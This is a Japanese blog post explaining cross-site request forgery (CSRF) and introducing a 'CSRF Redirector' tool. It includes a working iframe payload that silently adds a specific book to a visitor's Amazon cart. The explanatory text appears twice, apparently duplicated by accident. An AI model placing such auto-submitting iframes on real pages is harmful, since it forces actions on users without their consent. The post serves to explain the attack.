CSRF Redirecor
スポンサーリンク
CSRF(Cross Site Request Forgeries、
クロスサイトリクエストフォージェリー) リダイレクタ
の紹介。
CSRFとは、ユーザが意図しないアクションをさせられてしまうこと。
具体的には、掲示板に勝手に書き込みをさせられたり、
ショッピングのカートに勝手に商品を入れられたり、
Webサービスのカレンダーに勝手に予定を入れられたり、
そういった、リクエストを勝手に送られてしまう。
mixiで発生した「ぼくはまちちゃん」騒動で広く知られるようになった。
CSRF Redirecor
XSS Post Forwarderの刺激を受けて作ったもの。
何をするかというと、GETのパラメータからフォームを作成し、
そのフォームをsubmitするJavaScriptを埋め込んだページを生成する
URLをiframeで読み込む。
下記のソースが含まれるページにアクセスすると、
アマゾン(amazon.comのほう)のカートに Essential PHP
Security の本を勝手に入れてしまう。
参考
[2007-07-19] XSS Post Forwarder
XSS Post Forwarder のサイト
http://shiflett.org/blog/2007/jul/csrf-redirector
クロスサイトリクエストフォージェリー) リダイレクタ
の紹介。
CSRFとは、ユーザが意図しないアクションをさせられてしまうこと。
具体的には、掲示板に勝手に書き込みをさせられたり、
ショッピングのカートに勝手に商品を入れられたり、
Webサービスのカレンダーに勝手に予定を入れられたり、
そういった、リクエストを勝手に送られてしまう。
mixiで発生した「ぼくはまちちゃん」騒動で広く知られるようになった。
CSRF Redirecor
XSS Post Forwarderの刺激を受けて作ったもの。
何をするかというと、GETのパラメータからフォームを作成し、
そのフォームをsubmitするJavaScriptを埋め込んだページを生成する
URLをiframeで読み込む。
下記のソースが含まれるページにアクセスすると、
アマゾン(amazon.comのほう)のカートに Essential PHP
Security の本を勝手に入れてしまう。
<iframe src="http://shiflett.org/csrf.php?csrf=http%3A%2F%2Famazon.com%2Fgp%2Fproduct%2Fhandle-buy-box&ASIN=059600656X&offerListingID=XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />
参考
[2007-07-19] XSS Post Forwarder
XSS Post Forwarder のサイト
http://shiflett.org/blog/2007/jul/csrf-redirector
スポンサーリンク
スポンサーリンク
いつもシェア、ありがとうございます!
もっと情報を探しませんか?
関連記事
最近の記事
- パナソニック ジェットウォッシャードルツ EW-DJ61-Wのホースの修理
- LinuxセキュリティモジュールIntegrity Policy Enforcement
- アマゾンのEcho Show 5を買ったのでレビューします
- アマゾンのサイバーマンデーはAlexa Echo Show 5が安い
- Android スマートフォン OnePlus 7T と OnePlus 7の違い
- Android スマートフォン OnePlus 7 をAndroid10にアップデートしてみた
- クレジットカードのバーチャルカードの比較のまとめ
- 活動量計 Xiaomi Mi Band 4を買ってみたのでレビュー
- Android スマートフォン OnePlus 7 のレビュー
- AliExpressでスマートフォンを買い物してみた
- パソコンのホコリ対策 レンジフードフィルターと養生テープ
- 80PLUS GOLDのPC電源ユニットAntec NeoEco 750 Goldのレビュー
- イギリスの付加価値税 VAT は払い戻しを受けられる
- イギリスのロンドンでスーツケースなど荷物を預けられる場所は
- イギリスのロンドンで地下鉄やバスに乗るならオイスターカードを使おう
- イギリスのヒースロー空港からロンドン市内への行き方
- 航空便でほかの航空会社に乗り継ぎがある場合のオンラインチェックイン
- SFC会員がANA便ではなくベトナム航空のコードシェアを試して解ったこと
- ベトナムの入国審査でeチケットの掲示が必要だった話
- シアトルの交通ICカードはオルカカード(Orca)です
人気のページ
- Windows7 IME 辞書ツールで単語の登録に失敗しました
- C言語 popen()でコマンドを実行して出力を読み込む
- Windows7で休止状態にする方法
- CentOS MySQLの起動、停止、再起動
- loggerコマンドでsyslogにエラーを出力する方法
- パソコンパーツの買取をしてくれる店のまとめ
- Java Mapの使い方 get(),put(),remove(),size(),clear()
- 楽天のRポイントカードを作ってみた
- iPhone 5 から iPhone 6 に乗り換えたのでレビュー
- netstatコマンドのステータスの意味
スポンサーリンク
過去ログ
2020 : 01 02 03 04 05 06 07 08 09 10 11 122019 : 01 02 03 04 05 06 07 08 09 10 11 12
2018 : 01 02 03 04 05 06 07 08 09 10 11 12
2017 : 01 02 03 04 05 06 07 08 09 10 11 12
2016 : 01 02 03 04 05 06 07 08 09 10 11 12
2015 : 01 02 03 04 05 06 07 08 09 10 11 12
2014 : 01 02 03 04 05 06 07 08 09 10 11 12
2013 : 01 02 03 04 05 06 07 08 09 10 11 12
2012 : 01 02 03 04 05 06 07 08 09 10 11 12
2011 : 01 02 03 04 05 06 07 08 09 10 11 12
2010 : 01 02 03 04 05 06 07 08 09 10 11 12
2009 : 01 02 03 04 05 06 07 08 09 10 11 12
2008 : 01 02 03 04 05 06 07 08 09 10 11 12
2007 : 01 02 03 04 05 06 07 08 09 10 11 12
2006 : 01 02 03 04 05 06 07 08 09 10 11 12
2005 : 01 02 03 04 05 06 07 08 09 10 11 12
2004 : 01 02 03 04 05 06 07 08 09 10 11 12
2003 : 01 02 03 04 05 06 07 08 09 10 11 12